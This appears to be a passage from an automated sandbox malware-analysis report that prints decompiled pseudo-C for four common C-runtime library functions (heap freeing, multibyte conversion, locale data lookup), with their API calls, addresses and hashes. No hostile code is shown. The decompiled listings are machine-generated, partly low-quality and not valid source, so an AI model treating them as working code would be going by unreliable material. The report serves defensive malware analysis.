                            APIs
                            • __getptd.LIBCMT ref: 013287F7
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __amsg_exit.LIBCMT ref: 01328817
                            • __lock.LIBCMT ref: 01328827
                            • InterlockedDecrement.KERNEL32(?), ref: 01328844
                            • InterlockedIncrement.KERNEL32(0132F780), ref: 0132886F
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction ID: 494ec1cdcd8f8986daad00a11c73874ee2ecdee88d868881a6432ae855148e52
                            • Opcode Fuzzy Hash: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction Fuzzy Hash: 70018031901632ABEB31BFADB404B5E7FF8BF05B28F154159E910A7684CB78A941CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132567D Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 45%
                            			E0132567D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x132d5f8);
				_t8 = E01322A5C(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E01322AA1(_t8);
				}
				if( *0x1331cbc != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x1330264, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E013231DA(_t32);
						 *_t10 = E01323198(GetLastError());
					}
					goto L9;
				}
				E01321F64(__ebx, __edx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E01321F97(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E01321FC7();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E013256D3();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                            0x0132567d
                            0x0132567f
                            0x01325684
                            0x01325689
                            0x0132568e
                            0x01325705
                            0x0132570a
                            0x0132570a
                            0x01325697
                            0x013256dc
                            0x013256dd
                            0x013256e5
                            0x013256eb
                            0x013256ed
                            0x013256ef
                            0x01325702
                            0x01325704
                            0x00000000
                            0x013256ed
                            0x0132569b
                            0x013256a1
                            0x013256a6
                            0x013256ac
                            0x013256b1
                            0x013256b3
                            0x013256b4
                            0x013256b5
                            0x013256bb
                            0x013256bc
                            0x013256c3
                            0x013256cc
                            0x00000000
                            0x013256ce
                            0x013256ce
                            0x00000000
                            0x013256ce

                            APIs
                            • __lock.LIBCMT ref: 0132569B
                              • Part of subcall function 01321F64: __mtinitlocknum.LIBCMT ref: 01321F7A
                              • Part of subcall function 01321F64: __amsg_exit.LIBCMT ref: 01321F86
                              • Part of subcall function 01321F64: EnterCriticalSection.KERNEL32(0132122A,0132122A,?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001), ref: 01321F8E
                            • ___sbh_find_block.LIBCMT ref: 013256A6
                            • ___sbh_free_block.LIBCMT ref: 013256B5
                            • HeapFree.KERNEL32(00000000,?,0132D5F8,0000000C,01321F45,00000000,0132D4A0,0000000C,01321F7F,?,0132122A,?,0132904E,00000004,0132D7E0,0000000C), ref: 013256E5
                            • GetLastError.KERNEL32(?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001,00000214), ref: 013256F6
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 2714421763-0
                            • Opcode ID: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction ID: dd4315922994e3233120f3946ed9c20b540e9c94b40c428a95199ed5241f7cb0
                            • Opcode Fuzzy Hash: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction Fuzzy Hash: C3016771945336EAEB307F799C05B9E3BB8AF11768F205508E510A6080DB38D6408B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329F35 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01329F35(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t74;

				_t74 = _a8;
				if(_t74 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t74 != 0) {
						E01326D18( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0132A066( *_t74 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E013231DA(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x75ff5003
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x75ff5003
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t74[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x75ff5003
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t74 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                            0x01329f3f
                            0x01329f46
                            0x01329f5d
                            0x00000000
                            0x01329f4d
                            0x01329f4f
                            0x01329f69
                            0x01329f6e
                            0x01329f71
                            0x01329f74
                            0x01329f9d
                            0x01329fa4
                            0x01329fa6
                            0x0132a027
                            0x0132a039
                            0x0132a042
                            0x0132a044
                            0x01329f84
                            0x01329f84
                            0x01329f87
                            0x01329f89
                            0x01329f8c
                            0x01329f8c
                            0x01329f8c
                            0x01329f8c
                            0x00000000
                            0x01329f92
                            0x0132a006
                            0x0132a006
                            0x0132a00b
                            0x0132a011
                            0x0132a014
                            0x0132a016
                            0x0132a019
                            0x0132a019
                            0x0132a019
                            0x0132a019
                            0x00000000
                            0x0132a01d
                            0x01329fa8
                            0x01329fab
                            0x01329fab
                            0x01329fb1
                            0x01329fb4
                            0x01329fdb
                            0x01329fde
                            0x01329fde
                            0x01329fe4
                            0x00000000
                            0x00000000
                            0x01329fe6
                            0x01329fe9
                            0x00000000
                            0x00000000
                            0x01329feb
                            0x01329feb
                            0x01329feb
                            0x01329ff1
                            0x01329ff4
                            0x01329f62
                            0x01329f62
                            0x01329ffd
                            0x00000000
                            0x01329ffd
                            0x01329fb6
                            0x01329fb9
                            0x00000000
                            0x00000000
                            0x01329fbd
                            0x01329fcb
                            0x01329fce
                            0x01329fd4
                            0x01329fd6
                            0x01329fd9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01329fd9
                            0x01329f76
                            0x01329f79
                            0x01329f7b
                            0x01329f81
                            0x01329f81
                            0x00000000
                            0x01329f51
                            0x01329f51
                            0x01329f56
                            0x01329f5a
                            0x01329f5a
                            0x00000000
                            0x01329f56
                            0x01329f4f

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01329F69
                            • __isleadbyte_l.LIBCMT ref: 01329F9D
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 01329FCE
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 0132A03C
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction ID: 9925a9467550e1661e90385b3e113a8a5166dd9d538ce8a85aa80a7476eeecee
                            • Opcode Fuzzy Hash: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction Fuzzy Hash: EE31B231A0027AFFDB61EF68C880EAE3FB5FF0121AF1585A8E5698B191D730D944DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328F57 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E01328F57(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x132d7c0);
				E01322A5C(__ebx, __edi, __esi);
				_t29 = E013252A2(__ebx, _t31);
				_t13 =  *0x132fd9c; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E01321F64(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x132fd88; // 0x132fcb0
					 *((intOrPtr*)(_t30 - 0x1c)) = E01328F19(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E01328FC1();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E013252A2(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E01322CAC(_t25, 0x20);
				}
				return E01322AA1(_t29);
			}









                            0x01328f57
                            0x01328f57
                            0x01328f57
                            0x01328f57
                            0x01328f57
                            0x01328f59
                            0x01328f5e
                            0x01328f68
                            0x01328f6a
                            0x01328f72
                            0x01328f96
                            0x01328f98
                            0x01328f9e
                            0x01328fa2
                            0x01328fa5
                            0x01328fb0
                            0x01328fb3
                            0x01328fba
                            0x01328f74
                            0x01328f74
                            0x01328f78
                            0x00000000
                            0x01328f7a
                            0x01328f7f
                            0x01328f7f
                            0x01328f78
                            0x01328f84
                            0x01328f88
                            0x01328f8d
                            0x01328f95

                            APIs
                            • __getptd.LIBCMT ref: 01328F63
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __getptd.LIBCMT ref: 01328F7A
                            • __amsg_exit.LIBCMT ref: 01328F88
                            • __lock.LIBCMT ref: 01328F98
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction ID: 15dc13205acd01c2ef1072c42dfd1425dea07b4c5d3191b0de69106abc66c636
                            • Opcode Fuzzy Hash: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction Fuzzy Hash: 07F09031940736AFE730BFADA400F4E33F56F10728F144589D650A72D4CB349A05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%